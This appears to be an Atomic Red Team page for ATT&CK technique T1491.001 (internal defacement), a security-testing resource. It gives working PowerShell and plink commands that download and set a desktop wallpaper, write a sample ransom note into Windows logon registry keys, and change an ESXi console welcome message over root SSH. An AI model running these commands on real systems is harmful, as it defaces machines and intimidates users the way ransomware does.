T1491.001 - Defacement: Internal Defacement
Description from ATT&CK (opens in a new tab)
An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster)(Citation: Varonis) Disturbing or offensive images may be used as a part of Internal Defacement (opens in a new tab) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)
Atomic Tests
Atomic Test #1 - Replace Desktop Wallpaper
Downloads an image from a URL and sets it as the desktop wallpaper.
Supported Platforms: Windows
auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
url_of_wallpaper | URL pointing to the image file you wish to set as wallpaper | url | https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png (opens in a new tab) |
pointer_to_orginal_wallpaper | Full path to where a file containing the original wallpaper location will be saved | string | $env:TEMP\T1491.001-OrginalWallpaperLocation |
wallpaper_location | Full path to where the downloaded wallpaper image will be saved | string | $env:TEMP\T1491.001-newWallpaper.png |
Attack Commands: Run with powershell
!
$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
$wc = New-Object System.Net.WebClient
try{
$wc.DownloadFile($url, $imgLocation)
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($imgLocation)
}
catch [System.Net.WebException]{
Write-Host("Cannot download $url")
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($imgLocation)
}
finally{
$wc.Dispose()
}
Cleanup Commands:
$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) {
$orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}"
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($orgImg)
}
Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore
Remove-Item "#{wallpaper_location}" -ErrorAction Ignore
Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.
SynAck Ransomware (opens in a new tab), Grief Ransomware (opens in a new tab), Maze Ransomware (opens in a new tab), Pysa Ransomware (opens in a new tab), Spook Ransomware (opens in a new tab), DopplePaymer Ransomware (opens in a new tab), Reedemer Ransomware (opens in a new tab), Kangaroo Ransomware (opens in a new tab)
Supported Platforms: Windows
auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
legal_notice_caption | Title of ransom message | string | PYSA |
legal_notice_text | Body of ransom message | string | Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org |
Attack Commands: Run with powershell
! Elevation Required (e.g. root or admin)
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force
Cleanup Commands:
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
Atomic Test #3 - ESXi - Change Welcome Message on Direct Console User Interface (DCUI)
Changes the ESXi welcome message to potentially display ransom information. Reference (opens in a new tab)
Supported Platforms: Windows
auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
vm_host | Specify the host name or IP of the ESXi server. | string | atomic.local |
vm_user | Specify the privilege user account on the ESXi server. | string | root |
vm_pass | Specify the privileged user's password. | string | password |
plink_file | Path to Plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe |
Attack Commands: Run with command_prompt
!
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system welcomemsg set -m 'RANSOMWARE-NOTIFICATION'"
Dependencies: Run with powershell
!
Description: Check if we have plink
Check Prereq Commands:
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"